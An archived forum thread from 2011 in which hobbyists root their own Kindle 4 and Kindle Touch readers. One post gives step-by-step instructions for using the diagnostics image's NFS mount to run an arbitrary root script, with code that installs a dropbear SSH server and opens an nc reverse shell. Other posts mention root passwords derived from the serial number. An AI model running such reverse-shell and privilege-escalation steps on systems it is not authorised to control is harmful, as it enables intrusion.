Register Guidelines E-Books Search Today's Posts Mark Forums Read

Go Back   MobileRead Forums > E-Book Readers > Amazon Kindle > Kindle Developer's Corner

Notices

Reply
 
Thread Tools Search this Thread
Old 12-08-2011, 10:08 AM   #211
theholyraptor
Junior Member
theholyraptor began at the beginning.
 
Posts: 3
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
For all of you who have already opened up your K4 touch... any of you have the 3g option? Anyone tried swapping sims out for an older 3g "unlimited" kindle? I doubt this will work and it's probably software based on the K4 but I'm curious.
theholyraptor is offline   Reply With Quote
Old 12-08-2011, 11:26 AM   #212
yifanlu
Kindle Dissector
yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.
 
Posts: 662
Karma: 170717
Join Date: Jul 2010
Device: Amazon Kindle 3
Nmap shows no open ports. Also, I've said this before but 3G restrictions is on the kindle itself not based on amazon's servers. It's very easy to bypass.
yifanlu is offline   Reply With Quote
 
Enthusiast
Old 12-08-2011, 11:45 AM   #213
kkasmire
Member
kkasmire can extract oil from cheesekkasmire can extract oil from cheesekkasmire can extract oil from cheesekkasmire can extract oil from cheesekkasmire can extract oil from cheesekkasmire can extract oil from cheesekkasmire can extract oil from cheesekkasmire can extract oil from cheesekkasmire can extract oil from cheese
 
Posts: 12
Karma: 1126
Join Date: Nov 2011
Device: Kindle Touch
Before I crack open my Kindle Touch to access the serial port, has anyone tried to run SSH? One way of doing this is to drop SSH into the user-accessible folders over USB, login to the serial port console, and execute SSH from the console. Does this work?

Secondly, once this is performed, can SSH be integrated into the filesystem permanently, or does that require a new kernel?
kkasmire is offline   Reply With Quote
Old 12-08-2011, 03:54 PM   #214
yifanlu
Kindle Dissector
yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.yifanlu can program the VCR without an owner's manual.
 
Posts: 662
Karma: 170717
Join Date: Jul 2010
Device: Amazon Kindle 3
Quote:
Originally Posted by kkasmire View Post
Before I crack open my Kindle Touch to access the serial port, has anyone tried to run SSH? One way of doing this is to drop SSH into the user-accessible folders over USB, login to the serial port console, and execute SSH from the console. Does this work?

Secondly, once this is performed, can SSH be integrated into the filesystem permanently, or does that require a new kernel?
If you can attach the serial port, you have full access to the filesystem where you can copy dropbear or openssl to /sbin or something and create a startup script to run it on startup.
yifanlu is offline   Reply With Quote
Old 12-08-2011, 04:28 PM   #215
geekmaster
Всё гениальное просто.
geekmaster ought to be getting tired of karma fortunes by now.geekmaster ought to be getting tired of karma fortunes by now.geekmaster ought to be getting tired of karma fortunes by now.geekmaster ought to be getting tired of karma fortunes by now.geekmaster ought to be getting tired of karma fortunes by now.geekmaster ought to be getting tired of karma fortunes by now.geekmaster ought to be getting tired of karma fortunes by now.geekmaster ought to be getting tired of karma fortunes by now.geekmaster ought to be getting tired of karma fortunes by now.geekmaster ought to be getting tired of karma fortunes by now.geekmaster ought to be getting tired of karma fortunes by now.
 
geekmaster's Avatar
 
Posts: 5,069
Karma: 6789001
Join Date: Nov 2011
Location: Щедрость не имеет пределов.
Device: *.*
Early news: ramirami and dionoea reported having ssh over wifi working on kindle touch now too.

Last edited by geekmaster; 12-08-2011 at 04:57 PM.
geekmaster is offline   Reply With Quote
Old 12-08-2011, 04:32 PM   #216
dionoea
Enthusiast
dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.
 
Posts: 26
Karma: 3060
Join Date: Dec 2011
Device: kindle 4
Hello,

I've found a method to execute an arbitrary shell script using the diagnostics image. This is kind of useless for kindle 4 non touch since we already have an easier method but it may enable access to kindle touch.
The instructions are a bit complex. They assume that you know how to use usb ethernet and setup an NFS share.

1. Create a USBnet.xml file in your kindle's root directory (over usb). This file will describe a NFS mountpoint. We will use that functionality to override a script which can be executed by the wifi test item in the diagnostics image. The content of the xml file should look like:
Code:
<?xml version="1.0" standalone="no" ?>
<!-- USB Net info -->
<USB_NetInfo ipNumber="15" device_NFS_path="/opt/factory/tools/atheros/art_rel/art/bin/host/support/platformscripts" host_NFS_path="/path/to/nfs/share/on/host/" />
2. Setup an nfs share on your computer as /path/to/nfs/share/on/host/ (or whatever you want to call it).

3. Reboot your kindle in diagnostics mode

4. Enable USBnet (see previous post #202 for instructions). If your xml file was properly read you should see something like:
ipAddress : 192.168.15.244
netMask : 255.255.255.0
deviceAddr: EE5900000015
hostAddr : EE2900000015
device_NFS: /opt/factory/tools/atheros/art_rel/art/bin/host/support/platformscripts
host_NFS : /path/to/nfs/share/on/host/

5. Configure the network interface to use 192.168.15.201 on your computer. This is the IP address which the kindle will connect to to mount the NFS share.

6. In the same menu section as USBnet, mount the NFS share.

7. This is where things become interesting. On the NFS share, create an executable script called plat_YOSHI-SDIO.sh . Example content could be:
Code:
#! /bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin

mount -o remount,rw /

echo "howdy"
echo "hey" > /hello.msg
echo "here" > /var/local/hello.msg
echo "ho" > /mnt/us/hello.msg
8. In the Misc individual diagnostics > Wifi Test menu, execute the WIFI ON item. This will run the above script. Note that the kindle might freeze afterwards but it's ok, the script was run.

9. Reboot and connect as a usb mass storage device. You should now have a hello.msg file.

This hasn't been tested on a touch yet but I've had confirmation that the script we're trying to override exists so it seems like a pretty safe bet.

Of course my example script is pretty useless. But something like the following script should get you working sshd in the diagnostics image if you can get your hands on a kindle 4 non touch dropbearmulti binary:
Code:
#! /bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin

mount -o remount,rw /
cp /mnt/us/dropbearmulti /usr/local/bin/
mkdir /usr/local/sbin
ln -sfn /usr/local/bin/dropbearmulti /usr/local/sbin/dropbear
ln -sfn /usr/local/bin/dropbearmulti /usr/local/sbin/dropbearkey
mkdir /etc/dropbear
/usr/local/bin/dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key
You could also try setting up a reverse shell using provided binaries only.
On the host computer run:
Code:
nc -l -p 1234
In the script:
Code:
#! /bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
cd /tmp
mknod in p
nc 192.168.15.201 1234 0< in | sh > in 2>&1
.
Once the script is run you should be able to run commands from the host as if on a normal shell (albeit without a prompt). For example running "find /" should output the full file listing.

I'd love to have feedback from touch owners.

Last edited by dionoea; 12-09-2011 at 08:37 AM. Reason: Add reverse shell idea
dionoea is offline   Reply With Quote
Old 12-09-2011, 04:29 AM   #217
salfred
Junior Member
salfred began at the beginning.
 
Posts: 4
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
i happen to find 4.0.1 update modified root password of diag image.
@dionoea
your method is exactly what i thought about, i also tried mount nfs share of init.d
it works on k4 non-touch 4.0.1
salfred is offline   Reply With Quote
Old 12-09-2011, 04:57 AM   #218
dionoea
Enthusiast
dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.
 
Posts: 26
Karma: 3060
Join Date: Dec 2011
Device: kindle 4
Quote:
Originally Posted by salfred View Post
i happen to find 4.0.1 update modified root password of diag image.
Do they use fiona+hash in 4.0.1?

Quote:
@dionoea
your method is exactly what i thought about, i also tried mount nfs share of init.d
it works on k4 non-touch 4.0.1
Oh ... I tried exploiting it by mounting on init.d but couldn't get the scripts to be executed.
dionoea is offline   Reply With Quote
Old 12-09-2011, 05:01 AM   #219
karl_k
Junior Member
karl_k began at the beginning.
 
Posts: 8
Karma: 10
Join Date: Nov 2011
Device: Kindle4
howto howto howto !!

Hey seaniko7 / dionoea !

Quote:
Originally Posted by seaniko7 View Post
Actually "mario" password didn't seem to work for me, but by generating fionaXXXX from serial number I've successfully ssh'd to my Kindle 4 and played a little with rootfs ( screensavers, some init.d scripting etc. ). Thanks dionoea
Now I made myself nice nice screensaver and font "hacks".
I know its highly experimental and might brick the K4 no-touch, but would you be so kind and write up the steps you took ? I just want to change the screensaver pics, but ssh via wifi would also be super-cool !

Cheers,
Karl

Last edited by karl_k; 12-09-2011 at 05:03 AM.
karl_k is offline   Reply With Quote
Old 12-09-2011, 05:21 AM   #220
salfred
Junior Member
salfred began at the beginning.
 
Posts: 4
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
Quote:
Originally Posted by dionoea View Post
Do they use fiona+hash in 4.0.1?


Oh ... I tried exploiting it by mounting on init.d but couldn't get the scripts to be executed.
confirmed, 4.0.1 uses fiona with hash as password.
and i made a mistake, nfs share of init.d doesn't work. it was because my sshd survived that update XD
salfred is offline   Reply With Quote
Old 12-09-2011, 05:40 AM   #221
seaniko7
wannabe developer
seaniko7 can grok the meaning of the universe.seaniko7 can grok the meaning of the universe.seaniko7 can grok the meaning of the universe.seaniko7 can grok the meaning of the universe.seaniko7 can grok the meaning of the universe.seaniko7 can grok the meaning of the universe.seaniko7 can grok the meaning of the universe.seaniko7 can grok the meaning of the universe.seaniko7 can grok the meaning of the universe.seaniko7 can grok the meaning of the universe.seaniko7 can grok the meaning of the universe.
 
seaniko7's Avatar
 
Posts: 181
Karma: 156548
Join Date: Mar 2011
Device: Kindle: 2xKeyboard, Classic, 2xTouch, 2xPW, PW2; Onyx: Boox M92
Quote:
Originally Posted by karl_k View Post
Hey seaniko7 / dionoea !



I know its highly experimental and might brick the K4 no-touch, but would you be so kind and write up the steps you took ? I just want to change the screensaver pics, but ssh via wifi would also be super-cool !

Cheers,
Karl
Yup, I'll make a tut, which will also include steps needed for unbricking ( I messed up init.d while forcing it to load usbSerial on start, which obviously caused brick and it was tricky to fix, because recovery kernel won't allow you to export mmcblk0p1 ).
seaniko7 is offline   Reply With Quote
Old 12-09-2011, 06:03 AM   #222
stalker_by
Junior Member
stalker_by began at the beginning.
 
Posts: 4
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
Hi folks,

I try to get SSH on my Kindle 4 non-touch, but fails on usbNet step.
When I booting to Diag mode I didnt see "Enable usbNet" item, text on screen from top:

Code:
TEQUILA - System Diags
---- 1.0.6.194 --- -1097929848 ---

S) Device Settings
O) Operator test suite
R) Run in Test
G) Gas Gause
E) 511
T) Power Test
H) Adjust battery
M) MoviNand
N) Misc individual diagnostics
Y) ART 11g factory test
U) USB device mode
D) Exit, Reboot or Disable Diags
------------------
X) Exit - FW RIGHT to exit
Where I am wrong?
stalker_by is offline   Reply With Quote
Old 12-09-2011, 06:14 AM   #223
AlexeyII
Junior Member
AlexeyII began at the beginning.
 
Posts: 9
Karma: 10
Join Date: Dec 2011
Location: Uzbekistan
Device: Kindle 4
Quote:
Originally Posted by stalker_by View Post
Hi folks,

I try to get SSH on my Kindle 4 non-touch, but fails on usbNet step.
When I booting to Diag mode I didnt see "Enable usbNet" item, text on screen from top:
Code:
N) Misc individual diagnostics
Where I am wrong?
select bolded
AlexeyII is offline   Reply With Quote
Old 12-09-2011, 06:30 AM   #224
dionoea
Enthusiast
dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.dionoea could sell banana peel slippers to a Deveel.
 
Posts: 26
Karma: 3060
Join Date: Dec 2011
Device: kindle 4
Quote:
Originally Posted by karl_k View Post
I know its highly experimental and might brick the K4 no-touch, but would you be so kind and write up the steps you took ? I just want to change the screensaver pics, but ssh via wifi would also be super-cool !
You can use the instructions I posted in reply #202 . They're easy to use and work fine on the non touch. The complex NFS instructions should only be required for the touch version.
dionoea is offline   Reply With Quote
Old 12-09-2011, 07:03 AM   #225
stalker_by
Junior Member
stalker_by began at the beginning.
 
Posts: 4
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
Got it.

Anyone knows how to disable ads?
stalker_by is offline   Reply With Quote
Reply

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
No Progress bar on the Touch... grizedale Amazon Kindle 13 09-29-2011 05:02 PM
Questions about jailbreaking a Kindle 3 daviesgeek Kindle Developer's Corner 0 09-13-2011 02:09 PM
Touch screen vs keyboard e-ink only Zarich Which one should I buy? 24 03-05-2011 06:47 AM
Which Kindle do I need for jailbreaking? chas0039 Kindle Developer's Corner 6 11-10-2010 10:04 PM


All times are GMT -4. The time now is 10:41 PM.


MobileRead.com is a privately owned, operated and funded community.